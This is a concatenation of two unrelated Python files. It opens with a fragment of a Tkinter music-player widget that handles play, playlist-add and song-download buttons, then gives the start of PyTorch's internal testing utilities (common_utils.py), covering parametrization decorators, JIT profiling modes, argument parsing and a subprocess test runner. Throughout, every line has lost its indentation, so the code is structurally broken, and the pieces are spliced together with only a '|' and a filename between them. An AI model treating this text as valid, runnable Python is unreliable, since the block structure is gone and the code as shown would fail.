if self.song_data["song_id"] != Main.SONG_PLAY_NOW["song_id"]:
# update lists #
if Main.LIST_OF_PLAY != Main.LIST_OF_MUSIC:
Main.RANDOM_MUSIC_LIST = []
Main.LIST_OF_PLAY = Main.LIST_OF_MUSIC.copy()
Main.LIST_OF_PLAY["classes"] = list_of_songs_class.copy()
Main.PAST_SONG["past_lib"] = self.lib
Thread(target=self.update_music, daemon=True).start()
else:
Thread(target=Main.PLAYER.play, daemon=True).start() # play
# update buttons #
Main.SONG_LINE.draw_music_line()
Main.MENU.update_buttons()
# update window with more song info #
if Main.MORE_INFO_INTERFACE.num_of_wins:
Main.MORE_INFO_INTERFACE.song_info_draw(Main.PAST_SONG["class"].song_data, Main.MORE_INFO_INTERFACE.searched_data)
def add_click(self):
if self.click_add:
# Delete song #
self.click_add = 0
self.add_button["image"] = MyImage.ADD
MusicStorage.delete_song("database2.sqlite", self.song_data["song_id"])
else:
# Add song #
self.click_add = 1
self.add_button["image"] = MyImage.ADD_CLICK
MusicStorage.add_song("database2.sqlite", self.song_data)
def save_click(self):
if self.click_save:
# Delete song #
self.click_save = 0
self.save_button["image"] = MyImage.SAVE
MusicStorage.delete_song("database3.sqlite", self.song_data["song_id"])
MusicStorage.delete_song_file(self.song_data["song_id"])
else:
# Download song #
self.click_save = 1
self.save_button["image"] = MyImage.SAVE_CLICK
Thread(target=MusicStorage.download_music, args=(self.song_data["song_id"], self.song_data["url"])).start()
MusicStorage.add_song("database3.sqlite", self.song_data)
def more_click(self):
Main.MORE_INFO_INTERFACE.song_info_draw(self.song_data)
def draw_play_button(self, x_coord, button_color="background"):
self.click_play = 0
if Main.PLAYER_SETTINGS["play"] and Main.SONG_PLAY_NOW["song_id"] == self.song_data["song_id"]:
self.click_play = 1
self.play_button = Button(image=MyImage.PAUSE, command=lambda: self.play_click(), width=16, height=23, bd=0, bg=themes[Main.SETTINGS.theme][button_color], activebackground=themes[Main.SETTINGS.theme][button_color], relief=RIDGE)
else:
self.play_button = Button(image=MyImage.PLAY, command=lambda: self.play_click(), width=16, height=23, bd=0, bg=themes[Main.SETTINGS.theme][button_color], activebackground=themes[Main.SETTINGS.theme][button_color], relief=RIDGE)
self.play_button_draw = self.canvas.create_window(x_coord, self.y, anchor=W, window=self.play_button)
self.song_bbox = self.canvas.bbox(self.play_button_draw)
self.song_coords["play_button"] = self.canvas.bbox(self.play_button_draw)
def draw_add_button(self, x_coord, button_color="background"):
self.click_add = MusicStorage.check_song_in_db("database2.sqlite", self.song_data["song_id"])
if self.click_add:
self.add_button = Button(image=MyImage.ADD_CLICK, command=lambda: self.add_click(), width=17, height=17, bd=0, bg=themes[Main.SETTINGS.theme][button_color], activebackground=themes[Main.SETTINGS.theme][button_color], relief=RIDGE)
else:
self.add_button = Button(image=MyImage.ADD, command=lambda: self.add_click(), width=17, height=17, bd=0, bg=themes[Main.SETTINGS.theme][button_color], activebackground=themes[Main.SETTINGS.theme][button_color], relief=RIDGE)
self.add_button_draw = self.canvas.create_window(x_coord, self.y, anchor=W, window=self.add_button)
self.song_bbox = self.canvas.bbox(self.add_button_draw)
self.song_coords["add_button"] = self.canvas.bbox(self.add_button_draw)
def draw_save_button(self, x_coord, button_color="background"):
self.click_save = MusicStorage.check_song_in_db("database3.sqlite", self.song_data["song_id"])
if self.click_save:
self.save_button = Button(image=MyImage.SAVE_CLICK, command=lambda: self.save_click(), width=18, height=24, bd=0, bg=themes[Main.SETTINGS.theme][button_color], activebackground=themes[Main.SETTINGS.theme][button_color], relief=RIDGE)
else:
self.save_button = Button(image=MyImage.SAVE, command=lambda: self.save_click(), width=18, height=24, bd=0, bg=themes[Main.SETTINGS.theme][button_color], activebackground=themes[Main.SETTINGS.theme][button_color], relief=RIDGE)
self.save_button_draw = self.canvas.create_window(x_coord, self.y, anchor=W, window=self.save_button)
self.song_bbox = self.canvas.bbox(self.save_button_draw)
self.song_coords["save_button"] = self.canvas.bbox(self.save_button_draw)
def draw_more_button(self, x_coord, button_color="background"):
self.more_button_draw = self.canvas.create_window(x_coord, self.y+1, anchor=W, window=Button(image=MyImage.MORE_INFO, command=lambda: self.more_click(), width=12, height=16, bd=0, bg=themes[Main.SETTINGS.theme][button_color], activebackground=themes[Main.SETTINGS.theme][button_color], relief=RIDGE))
self.song_bbox = self.canvas.bbox(self.more_button_draw)
self.song_coords["more_button"] = self.canvas.bbox(self.more_button_draw)
def draw_name(self, x_coord):
song_name = self.song_data["name"][:34]+'...' if len(self.song_data["name"]) > 34 else self.song_data["name"]
song_author = self.song_data["author"][:34]+'...' if len(self.song_data["author"]) > 34 else self.song_data["author"]
self.name_draw = self.canvas.create_text(x_coord, self.y, text=f"{song_name} - ", fill=themes[Main.SETTINGS.theme]["text_color"], font="Verdana 12", anchor=W)
self.author_draw = self.canvas.create_text(self.canvas.bbox(self.name_draw)[2], self.y, text=song_author, fill=themes[Main.SETTINGS.theme]["text_second_color"], font="Verdana 12", anchor=W)
self.song_bbox = self.canvas.bbox(self.author_draw)
self.song_coords["name"] = self.canvas.bbox(self.author_draw)
|
common_utils.py
|
r"""Importing this file must **not** initialize CUDA context. test_distributed
relies on this assumption to properly run. This means that when this is imported
no CUDA calls shall be made, including torch.cuda.device_count(), etc.
torch.testing._internal.common_cuda.py can freely initialize CUDA context when imported.
"""
import sys
import os
import platform
import re
import gc
import types
import math
from functools import partial
import inspect
import io
import copy
import operator
import argparse
import unittest
import warnings
import random
import contextlib
import shutil
import threading
from pathlib import Path
import socket
import subprocess
import time
from collections import OrderedDict
from collections.abc import Sequence
from contextlib import contextmanager, closing
from functools import wraps
from itertools import product
from copy import deepcopy
from numbers import Number
import tempfile
import json
import __main__ # type: ignore[import]
import errno
import ctypes
from typing import cast, Any, Dict, Iterable, Iterator, Optional, Union, List, TypeVar
from unittest.mock import MagicMock
import numpy as np
import expecttest
from .._core import \
(_compare_tensors_internal, _compare_scalars_internal, _compare_return_type)
import torch
import torch.cuda
from torch.testing import make_tensor
from torch._utils_internal import get_writable_path
from torch._six import string_classes
from torch import Tensor
import torch.backends.cudnn
import torch.backends.mkl
from enum import Enum
from statistics import mean
import functools
from .composite_compliance import no_dispatch
torch.backends.disable_global_flags()
FILE_SCHEMA = "file://"
if sys.platform == 'win32':
FILE_SCHEMA = "file:///"
# Environment variable `IN_CI` is set in `.jenkins/common.sh`.
IS_IN_CI = os.getenv('IN_CI') == '1'
IS_SANDCASTLE = os.getenv('SANDCASTLE') == '1' or os.getenv('TW_JOB_USER') == 'sandcastle'
IS_FBCODE = os.getenv('PYTORCH_TEST_FBCODE') == '1'
IS_REMOTE_GPU = os.getenv('PYTORCH_TEST_REMOTE_GPU') == '1'
RETRY_TEST_CASES = os.getenv('PYTORCH_RETRY_TEST_CASES') == '1'
OVERRIDE_FLAKY_SIGNAL = os.getenv('PYTORCH_OVERRIDE_FLAKY_SIGNAL') == '1'
MAX_NUM_RETRIES = 3
DISABLED_TESTS_FILE = '.pytorch-disabled-tests.json'
SLOW_TESTS_FILE = '.pytorch-slow-tests.json'
slow_tests_dict: Optional[Dict[str, Any]] = None
disabled_tests_dict: Optional[Dict[str, Any]] = None
NATIVE_DEVICES = ('cpu', 'cuda', 'meta')
class _TestParametrizer(object):
"""
Decorator class for parametrizing a test function, yielding a set of new tests spawned
from the original generic test, each specialized for a specific set of test inputs. For
example, parametrizing a test across the set of ops will result in a test function per op.
The decision of how to parametrize / what to parametrize over is intended to be implemented
by each derived class.
In the details, the decorator adds a 'parametrize_fn' property to the test function that is called
during device-specific test instantiation performed in instantiate_device_type_tests(). Because of this,
there is no need to parametrize over device type, as that is already handled separately.
If the decorator is applied to a test function that already has a 'parametrize_fn' property, a new
composite 'parametrize_fn' will be created that generates tests with the product of the parameters
generated by the old and new parametrize_fns. This allows for convenient composability of decorators.
"""
def _parametrize_test(self, test, generic_cls, device_cls):
"""
Parametrizes the given test function across whatever dimension is specified by the derived class.
Tests can be parametrized over any arbitrary dimension or combination of dimensions, such as all
ops, all modules, or all ops + their associated dtypes.
Args:
test (fn): Test function to parametrize over
generic_cls (class): Generic test class object containing tests (e.g. TestFoo)
device_cls (class): Device-specialized test class object (e.g. TestFooCPU); set to None
if the tests are not part of a device-specific set
Returns:
Generator object returning 3-tuples of:
test (fn): Parametrized test function; must support a device arg and args for any params
test_name (str): Parametrized suffix for the test (e.g. opname_int64); will be appended to
the base name of the test
param_kwargs (dict): Param kwargs to pass to the test (e.g. {'op': 'add', 'dtype': torch.int64})
"""
raise NotImplementedError
def __call__(self, fn):
if hasattr(fn, 'parametrize_fn'):
# Do composition with the product of args.
old_parametrize_fn = fn.parametrize_fn
new_parametrize_fn = self._parametrize_test
fn.parametrize_fn = compose_parametrize_fns(old_parametrize_fn, new_parametrize_fn)
else:
fn.parametrize_fn = self._parametrize_test
return fn
def compose_parametrize_fns(old_parametrize_fn, new_parametrize_fn):
"""
Returns a parametrize_fn that parametrizes over the product of the parameters handled
by the given parametrize_fns. Each given parametrize_fn should each have the signature
f(test, generic_cls, device_cls).
The test names will be a combination of the names produced by the parametrize_fns in
"<new_name>_<old_name>" order. This order is done to match intuition for constructed names
when composing multiple decorators; the names will be built in top to bottom order when stacking
parametrization decorators.
Args:
old_parametrize_fn (callable) - First parametrize_fn to compose.
new_parametrize_fn (callable) - Second parametrize_fn to compose.
"""
def composite_fn(test, generic_cls, device_cls,
old_parametrize_fn=old_parametrize_fn,
new_parametrize_fn=new_parametrize_fn):
old_tests = [(test, test_name, param_kwargs) for (test, test_name, param_kwargs) in
old_parametrize_fn(test, generic_cls, device_cls)]
for (old_test, old_test_name, old_param_kwargs) in old_tests:
for (new_test, new_test_name, new_param_kwargs) in \
new_parametrize_fn(old_test, generic_cls, device_cls):
redundant_params = set(old_param_kwargs.keys()).intersection(new_param_kwargs.keys())
if redundant_params:
raise RuntimeError('Parametrization over the same parameter by multiple parametrization '
'decorators is not supported. For test "{}", the following parameters '
'are handled multiple times: {}'.format(
test.__name__, redundant_params))
full_param_kwargs = {**old_param_kwargs, **new_param_kwargs}
merged_test_name = '{}{}{}'.format(new_test_name,
'_' if old_test_name != '' and new_test_name != '' else '',
old_test_name)
yield (new_test, merged_test_name, full_param_kwargs)
return composite_fn
def instantiate_parametrized_tests(generic_cls):
"""
Instantiates tests that have been decorated with a parametrize_fn. This is generally performed by a
decorator subclass of _TestParametrizer. The generic test will be replaced on the test class by
parametrized tests with specialized names.
Args:
generic_cls (class): Generic test class object containing tests (e.g. TestFoo)
"""
for attr_name in tuple(dir(generic_cls)):
class_attr = getattr(generic_cls, attr_name)
if not hasattr(class_attr, 'parametrize_fn'):
continue
# Remove the generic test from the test class.
delattr(generic_cls, attr_name)
# Add parametrized tests to the test class.
def instantiate_test_helper(cls, name, test, param_kwargs):
@wraps(test)
def instantiated_test(self, param_kwargs=param_kwargs):
test(self, **param_kwargs)
assert not hasattr(generic_cls, name), "Redefinition of test {0}".format(name)
setattr(generic_cls, name, instantiated_test)
for (test, test_suffix, param_kwargs) in class_attr.parametrize_fn(
class_attr, generic_cls=generic_cls, device_cls=None):
full_name = '{}_{}'.format(test.__name__, test_suffix)
instantiate_test_helper(cls=generic_cls, name=full_name, test=test, param_kwargs=param_kwargs)
class subtest(object):
"""
Explicit subtest case for use with test parametrization.
Allows for explicit naming of individual subtest cases as well as applying
decorators to the parametrized test.
Args:
arg_values (iterable): Iterable of arg values (e.g. range(10)) or
tuples of arg values (e.g. [(1, 2), (3, 4)]).
name (str): Optional name to use for the test.
decorators (iterable): Iterable of decorators to apply to the generated test.
"""
__slots__ = ['arg_values', 'name', 'decorators']
def __init__(self, arg_values, name=None, decorators=None):
self.arg_values = arg_values
self.name = name
self.decorators = decorators if decorators else []
class parametrize(_TestParametrizer):
"""
Decorator for applying generic test parametrizations.
The interface for this decorator is modeled after `@pytest.mark.parametrize`.
Basic usage between this decorator and pytest's is identical. The first argument
should be a string containing comma-separated names of parameters for the test, and
the second argument should be an iterable returning values or tuples of values for
the case of multiple parameters.
Beyond this basic usage, the decorator provides some additional functionality that
pytest does not.
1. Parametrized tests end up as generated test functions on unittest test classes.
Since this differs from how pytest works, this decorator takes on the additional
responsibility of naming these test functions. The default test names consists of
the test's base name followed by each parameter name + value (e.g. "test_bar_x_1_y_foo"),
but custom names can be defined using `name_fn` or the `subtest` structure (see below).
2. The decorator specially handles parameter values of type `subtest`, which allows for
more fine-grained control over both test naming and test execution. In particular, it can
be used to tag subtests with explicit test names or apply arbitrary decorators (see examples
below).
Examples::
@parametrize("x", range(5))
def test_foo(self, x):
...
@parametrize("x,y", [(1, 'foo'), (2, 'bar'), (3, 'baz')])
def test_bar(self, x, y):
...
@parametrize("x,y", [(1, 'foo'), (2, 'bar'), (3, 'baz')],
name_fn=lambda x, y: '{}_{}'.format(x, y))
def test_bar_custom_names(self, x, y):
...
@parametrize("x, y", [subtest((1, 2), name='double'),
subtest((1, 3), name='triple', decorators=[unittest.expectedFailure]),
subtest((1, 4), name='quadruple')])
def test_baz(self, x, y):
...
Args:
arg_str (str): String of arg names separate by commas (e.g. "x,y").
arg_values (iterable): Iterable of arg values (e.g. range(10)) or
tuples of arg values (e.g. [(1, 2), (3, 4)]).
name_fn (callable): Optional function that takes in parameters and returns subtest name.
"""
def __init__(self, arg_str, arg_values, name_fn=None):
self.arg_names = arg_str.split(',')
self.arg_values = arg_values
self.name_fn = name_fn
def _formatted_str_repr(self, name, value):
""" Returns a string representation for the given arg that is suitable for use in test function names. """
if isinstance(value, torch.dtype):
return dtype_name(value)
elif isinstance(value, torch.device):
return str(value)
# Can't use isinstance as it would cause a circular import
elif value.__class__.__name__ == 'OpInfo' or value.__class__.__name__ == 'ModuleInfo':
return value.formatted_name
else:
# Include name and value separated by underscore.
return '{}_{}'.format(name, str(value).replace('.', '_'))
def _default_subtest_name(self, values):
return '_'.join([self._formatted_str_repr(a, v) for a, v in zip(self.arg_names, values)])
def _get_subtest_name(self, values, explicit_name=None):
if explicit_name:
subtest_name = explicit_name
elif self.name_fn:
subtest_name = self.name_fn(*values)
else:
subtest_name = self._default_subtest_name(values)
return subtest_name
def _parametrize_test(self, test, generic_cls, device_cls):
if len(self.arg_names) == 0:
# No additional parameters needed for the test.
test_name = ''
yield (test, test_name, {})
else:
# Each "values" item is expected to be either:
# * A tuple of values with one for each arg. For a single arg, a single item is expected.
# * A subtest instance with arg_values matching the previous.
for values in self.arg_values:
maybe_name = None
if isinstance(values, subtest):
sub = values
values = sub.arg_values
maybe_name = sub.name
# Apply decorators.
@wraps(test)
def test_wrapper(*args, **kwargs):
return test(*args, **kwargs)
for decorator in sub.decorators:
test_wrapper = decorator(test_wrapper)
gen_test = test_wrapper
else:
gen_test = test
values = list(values) if len(self.arg_names) > 1 else [values]
if len(values) != len(self.arg_names):
raise RuntimeError('Expected # values == # arg names, but got: {} '
'values and {} names for test "{}"'.format(
len(values), len(self.arg_names), test.__name__))
param_kwargs = {
name: value for name, value in zip(self.arg_names, values)
}
test_name = self._get_subtest_name(values, explicit_name=maybe_name)
if '.' in test_name:
raise RuntimeError('Test name cannot contain periods, but got: {}'.format(test_name))
yield (gen_test, test_name, param_kwargs)
class ProfilingMode(Enum):
LEGACY = 1
SIMPLE = 2
PROFILING = 3
def cppProfilingFlagsToProfilingMode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
if old_prof_exec_state:
if old_prof_mode_state:
return ProfilingMode.PROFILING
else:
return ProfilingMode.SIMPLE
else:
return ProfilingMode.LEGACY
@contextmanager
def enable_profiling_mode_for_profiling_tests():
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
try:
yield
finally:
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
@contextmanager
def enable_profiling_mode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
try:
yield
finally:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
@contextmanager
def num_profiled_runs(num_runs):
old_num_runs = torch._C._jit_set_num_profiled_runs(num_runs)
try:
yield
finally:
torch._C._jit_set_num_profiled_runs(old_num_runs)
func_call = torch._C.ScriptFunction.__call__
meth_call = torch._C.ScriptMethod.__call__
def prof_callable(callable, *args, **kwargs):
if 'profile_and_replay' in kwargs:
del kwargs['profile_and_replay']
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
with enable_profiling_mode_for_profiling_tests():
callable(*args, **kwargs)
return callable(*args, **kwargs)
return callable(*args, **kwargs)
def prof_func_call(*args, **kwargs):
return prof_callable(func_call, *args, **kwargs)
def prof_meth_call(*args, **kwargs):
return prof_callable(meth_call, *args, **kwargs)
# TODO fix when https://github.com/python/mypy/issues/2427 is address
torch._C.ScriptFunction.__call__ = prof_func_call # type: ignore[assignment]
torch._C.ScriptMethod.__call__ = prof_meth_call # type: ignore[assignment]
def _get_test_report_path():
# allow users to override the test file location. We need this
# because the distributed tests run the same test file multiple
# times with different configurations.
override = os.environ.get('TEST_REPORT_SOURCE_OVERRIDE')
test_source = override if override is not None else 'python-unittest'
return os.path.join('test-reports', test_source)
parser = argparse.ArgumentParser()
parser.add_argument('--subprocess', action='store_true',
help='whether to run each test in a subprocess')
parser.add_argument('--seed', type=int, default=1234)
parser.add_argument('--accept', action='store_true')
parser.add_argument('--jit_executor', type=str)
parser.add_argument('--repeat', type=int, default=1)
parser.add_argument('--test_bailouts', action='store_true')
parser.add_argument('--save-xml', nargs='?', type=str,
const=_get_test_report_path(),
default=_get_test_report_path() if IS_IN_CI else None)
parser.add_argument('--discover-tests', action='store_true')
parser.add_argument('--log-suffix', type=str, default="")
parser.add_argument('--run-parallel', type=int, default=1)
parser.add_argument('--import-slow-tests', type=str, nargs='?', const=SLOW_TESTS_FILE)
parser.add_argument('--import-disabled-tests', type=str, nargs='?', const=DISABLED_TESTS_FILE)
# Only run when -h or --help flag is active to display both unittest and parser help messages.
def run_unittest_help(argv):
unittest.main(argv=argv)
if '-h' in sys.argv or '--help' in sys.argv:
help_thread = threading.Thread(target=run_unittest_help, args=(sys.argv,))
help_thread.start()
help_thread.join()
args, remaining = parser.parse_known_args()
if args.jit_executor == 'legacy':
GRAPH_EXECUTOR = ProfilingMode.LEGACY
elif args.jit_executor == 'profiling':
GRAPH_EXECUTOR = ProfilingMode.PROFILING
elif args.jit_executor == 'simple':
GRAPH_EXECUTOR = ProfilingMode.SIMPLE
else:
# infer flags based on the default settings
GRAPH_EXECUTOR = cppProfilingFlagsToProfilingMode()
IMPORT_SLOW_TESTS = args.import_slow_tests
IMPORT_DISABLED_TESTS = args.import_disabled_tests
LOG_SUFFIX = args.log_suffix
RUN_PARALLEL = args.run_parallel
TEST_BAILOUTS = args.test_bailouts
TEST_DISCOVER = args.discover_tests
TEST_IN_SUBPROCESS = args.subprocess
TEST_SAVE_XML = args.save_xml
REPEAT_COUNT = args.repeat
SEED = args.seed
if not expecttest.ACCEPT:
expecttest.ACCEPT = args.accept
UNITTEST_ARGS = [sys.argv[0]] + remaining
torch.manual_seed(SEED)
# CI Prefix path used only on CI environment
CI_TEST_PREFIX = str(Path(os.getcwd()))
def wait_for_process(p):
try:
return p.wait()
except KeyboardInterrupt:
# Give `p` a chance to handle KeyboardInterrupt. Without this,
# `pytest` can't print errors it collected so far upon KeyboardInterrupt.
exit_status = p.wait(timeout=5)
if exit_status is not None:
return exit_status
else:
p.kill()
raise
except: # noqa: B001,E722, copied from python core library
p.kill()
raise
finally:
# Always call p.wait() to ensure exit
p.wait()
def shell(command, cwd=None, env=None):
sys.stdout.flush()
sys.stderr.flush()
# The following cool snippet is copied from Py3 core library subprocess.call
# only the with
# 1. `except KeyboardInterrupt` block added for SIGINT handling.
# 2. In Py2, subprocess.Popen doesn't return a context manager, so we do
# `p.wait()` in a `final` block for the code to be portable.
#
# https://github.com/python/cpython/blob/71b6c1af727fbe13525fb734568057d78cea33f3/Lib/subprocess.py#L309-L323
assert not isinstance(command, torch._six.string_classes), "Command to shell should be a list or tuple of tokens"
p = subprocess.Popen(command, universal_newlines=True, cwd=cwd, env=env)
return wait_for_process(p)
def discover_test_cases_recursively(suite_or_case):
if isinstance(suite_or_case, unittest.TestCase):
return [suite_or_case]
rc = []
for element in suite_or_case:
print(element)
rc.extend(discover_test_cases_recursively(element))
return rc
def get_test_names(test_cases):
return ['.'.join(case.id().split('.')[-2:]) for case in test_cases]
def _print_test_names():
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
for name in get_test_names(test_cases):
print(name)
def chunk_list(lst, nchunks):
return [lst[i::nchunks] for i in range(nchunks)]
# sanitize filename e.g., distributed/pipeline/sync/skip/test_api.py -> distributed.pipeline.sync.skip.test_api
def sanitize_test_filename(filename):
# inspect.getfile returns absolute path in some CI jobs, converting it to relative path if needed
if filename.startswith(CI_TEST_PREFIX):
filename = filename[len(CI_TEST_PREFIX) + 1:]
strip_py = re.sub(r'.py$', '', filename)
return re.sub('/', r'.', strip_py)
def lint_test_case_extension(suite):
succeed = True
for test_case_or_suite in suite:
test_case = test_case_or_suite
if isinstance(test_case_or_suite, unittest.TestSuite):
first_test = test_case_or_suite._tests[0] if len(test_case_or_suite._tests) > 0 else None
if first_test is not None and isinstance(first_test, unittest.TestSuite):
return succeed and lint_test_case_extension(test_case_or_suite)
test_case = first_test
if test_case is not None:
test_class = test_case.id().split('.', 1)[1].split('.')[0]
if not isinstance(test_case, TestCase):
err = "This test class should extend from torch.testing._internal.common_utils.TestCase but it doesn't."
print(f"{test_class} - failed. {err}")
succeed = False
return succeed
def run_tests(argv=UNITTEST_ARGS):
# import test files.
if IMPORT_SLOW_TESTS:
if os.path.exists(IMPORT_SLOW_TESTS):
global slow_tests_dict
with open(IMPORT_SLOW_TESTS, 'r') as fp:
slow_tests_dict = json.load(fp)
else:
print(f'[WARNING] slow test file provided but not found: {IMPORT_SLOW_TESTS}')
if IMPORT_DISABLED_TESTS:
if os.path.exists(IMPORT_DISABLED_TESTS):
global disabled_tests_dict
with open(IMPORT_DISABLED_TESTS, 'r') as fp:
disabled_tests_dict = json.load(fp)
else:
print(f'[WARNING] disabled test file provided but not found: {IMPORT_DISABLED_TESTS}')
# Determine the test launch mechanism
if TEST_DISCOVER:
_print_test_names()
return
# Before running the tests, lint to check that every test class extends from TestCase
suite = unittest.TestLoader().loadTestsFromModule(__main__)
if not lint_test_case_extension(suite):
sys.exit(1)
if TEST_IN_SUBPROCESS:
failed_tests = []
test_cases = discover_test_cases_recursively(suite)
for case in test_cases:
test_case_full_name = case.id().split('.', 1)[1]
other_args = []
if IMPORT_DISABLED_TESTS:
other_args.append('--import-disabled-tests')
if IMPORT_SLOW_TESTS:
other_args.append('--import-slow-tests')
cmd = [sys.executable] + [argv[0]] + other_args + argv[1:] + [test_case_full_name]
string_cmd = " ".join(cmd)
exitcode = shell(cmd)
if exitcode != 0:
# This is sort of hacky, but add on relevant env variables for distributed tests.
if 'TestDistBackendWithSpawn' in test_case_full_name:
backend = os.environ.get("BACKEND", "")
world_size = os.environ.get("WORLD_SIZE", "")
env_prefix = f"BACKEND={backend} WORLD_SIZE={world_size}"
string_cmd = env_prefix + " " + string_cmd
# Log the command to reproduce the failure.
print(f"Test exited with non-zero exitcode {exitcode}. Command to reproduce: {string_cmd}")
failed_tests.append(test_case_full_name)
assert len(failed_tests) == 0, "{} unit test(s) failed:\n\t{}".format(
len(failed_tests), '\n\t'.join(failed_tests))
elif RUN_PARALLEL > 1:
test_cases = discover_test_cases_recursively(suite)
test_batches = chunk_list(get_test_names(test_cases), RUN_PARALLEL)
processes = []
for i in range(RUN_PARALLEL):
command = [sys.executable] + argv + ['--log-suffix=-shard-{}'.format(i + 1)] + test_batches[i]
processes.append(subprocess.Popen(command, universal_newlines=True))
failed = False
for p in processes:
failed |= wait_for_process(p) != 0
assert not failed, "Some test shards have failed"
elif TEST_SAVE_XML is not None:
# import here so that non-CI doesn't need xmlrunner installed
import xmlrunner # type: ignore[import]
test_filename = sanitize_test_filename(inspect.getfile(sys._getframe(1)))
test_report_path = TEST_SAVE_XML + LOG_SUFFIX
test_report_path = os.path.join(test_report_path, test_filename)
os.makedirs(test_report_path, exist_ok=True)
verbose = '--verbose' in argv or '-v' in argv
if verbose:
print('Test results will be stored in {}'.format(test_report_path))
unittest.main(argv=argv, testRunner=xmlrunner.XMLTestRunner(output=test_report_path, verbosity=2 if verbose else 1))
elif REPEAT_COUNT > 1:
for _ in range(REPEAT_COUNT):
if not unittest.main(exit=False, argv=argv).result.wasSuccessful():
sys.exit(-1)
else:
unittest.main(argv=argv)
IS_LINUX = sys.platform == "linux"
IS_WINDOWS = sys.platform == "win32"
IS_MACOS = sys.platform == "darwin"
IS_PPC = platform.machine() == "ppc64le"
def is_avx512_vnni_supported():
if sys.platform != 'linux':
return False
with open("/proc/cpuinfo", encoding="ascii") as f:
lines = f.read()
return "vnni" in lines
IS_AVX512_VNNI_SUPPORTED = is_avx512_vnni_supported()
if IS_WINDOWS:
@contextmanager
def TemporaryFileName(*args, **kwargs):
# Ideally we would like to not have to manually delete the file, but NamedTemporaryFile
# opens the file, and it cannot be opened multiple times in Windows. To support Windows,
# close the file after creation and try to remove it manually
if 'delete' in kwargs:
if kwargs['delete'] is not False:
raise UserWarning("only TemporaryFileName with delete=False is supported on Windows.")
else:
kwargs['delete'] = False
f = tempfile.NamedTemporaryFile(*args, **kwargs)
try:
f.close()
yield f.name
finally:
os.unlink(f.name)
else:
@contextmanager # noqa: T484
def TemporaryFileName(*args, **kwargs):
with tempfile.NamedTemporaryFile(*args, **kwargs) as f:
yield f.name
if IS_WINDOWS:
@contextmanager
def TemporaryDirectoryName(suffix=None):
# On Windows the directory created by TemporaryDirectory is likely to be removed prematurely,
# so we first create the directory using mkdtemp and then remove it manually
try:
dir_name = tempfile.mkdtemp(suffix=suffix)
yield dir_name
finally:
shutil.rmtree(dir_name)
else:
@contextmanager # noqa: T484
def TemporaryDirectoryName(suffix=None):
with tempfile.TemporaryDirectory(suffix=suffix) as d:
yield d
IS_FILESYSTEM_UTF8_ENCODING = sys.getfilesystemencoding() == 'utf-8'
def _check_module_exists(name: str) -> bool:
r"""Returns if a top-level module with :attr:`name` exists *without**
importing it. This is generally safer than try-catch block around a
`import X`. It avoids third party libraries breaking assumptions of some of
our tests, e.g., setting multiprocessing start method when imported
(see librosa/#747, torchvision/#544).
"""
try:
import importlib.util
spec = importlib.util.find_spec(name)
return spec is not None
except ImportError:
return False
TEST_NUMPY = _check_module_exists('numpy')
TEST_SCIPY = _check_module_exists('scipy')
TEST_MKL = torch.backends.mkl.is_available()
TEST_CUDA = torch.cuda.is_available()
TEST_NUMBA = _check_module_exists('numba')
TEST_DILL = _check_module_exists('dill')
TEST_LIBROSA = _check_module_exists('librosa')
BUILD_WITH_CAFFE2 = _check_module_exists("caffe2.python.caffe2_pybind11_state")
# Python 2.7 doesn't have spawn
NO_MULTIPROCESSING_SPAWN = os.environ.get('NO_MULTIPROCESSING_SPAWN', '0') == '1'
TEST_WITH_ASAN = os.getenv('PYTORCH_TEST_WITH_ASAN', '0') == '1'
TEST_WITH_DEV_DBG_ASAN = os.getenv('PYTORCH_TEST_WITH_DEV_DBG_ASAN', '0') == '1'
TEST_WITH_TSAN = os.getenv('PYTORCH_TEST_WITH_TSAN', '0') == '1'
TEST_WITH_UBSAN = os.getenv('PYTORCH_TEST_WITH_UBSAN', '0') == '1'
TEST_WITH_ROCM = os.getenv('PYTORCH_TEST_WITH_ROCM', '0') == '1'
# TODO: Remove PYTORCH_MIOPEN_SUGGEST_NHWC once ROCm officially supports NHWC in MIOpen
# See #64427
TEST_WITH_MIOPEN_SUGGEST_NHWC = os.getenv('PYTORCH_MIOPEN_SUGGEST_NHWC', '0') == '1'
# Enables tests that are slow to run (disabled by default)
TEST_WITH_SLOW = os.getenv('PYTORCH_TEST_WITH_SLOW', '0') == '1'
# Disables non-slow tests (these tests enabled by default)
# This is usually used in conjunction with TEST_WITH_SLOW to
# run *only* slow tests. (I could have done an enum, but
# it felt a little awkward.
TEST_SKIP_FAST = os.getenv('PYTORCH_TEST_SKIP_FAST', '0') == '1'
# Disables noarch tests; all but one CI configuration disables these. We don't
# disable them for local runs because you still want to run them
# (unlike slow tests!)
TEST_SKIP_NOARCH = os.getenv('PYTORCH_TEST_SKIP_NOARCH', '0') == '1'
# Determine whether to enable cuda memory leak check.
# CUDA mem leak check is expensive and thus we don't want to execute it on every
# test case / configuration.
# If this is True then CUDA memory leak checks are skipped. If this is false
# then CUDA memory leak checks are performed.
# See: https://github.com/pytorch/pytorch/pull/59402#issuecomment-858811135
TEST_SKIP_CUDA_MEM_LEAK_CHECK = os.getenv('PYTORCH_TEST_SKIP_CUDA_MEM_LEAK_CHECK', '0') == '1'
# Disables tests for when on Github Actions
ON_GHA = os.getenv('GITHUB_ACTIONS', '0') == '1'
# True if CI is running TBB-enabled Pytorch
IS_TBB = "tbb" in os.getenv("BUILD_ENVIRONMENT", "")
# Dict of NumPy dtype -> torch dtype (when the correspondence exists)
numpy_to_torch_dtype_dict = {
np.bool_ : torch.bool,
np.uint8 : torch.uint8,
np.int8 : torch.int8,
np.int16 : torch.int16,
np.int32 : torch.int32,
np.int64 : torch.int64,
np.float16 : torch.float16,
np.float32 : torch.float32,
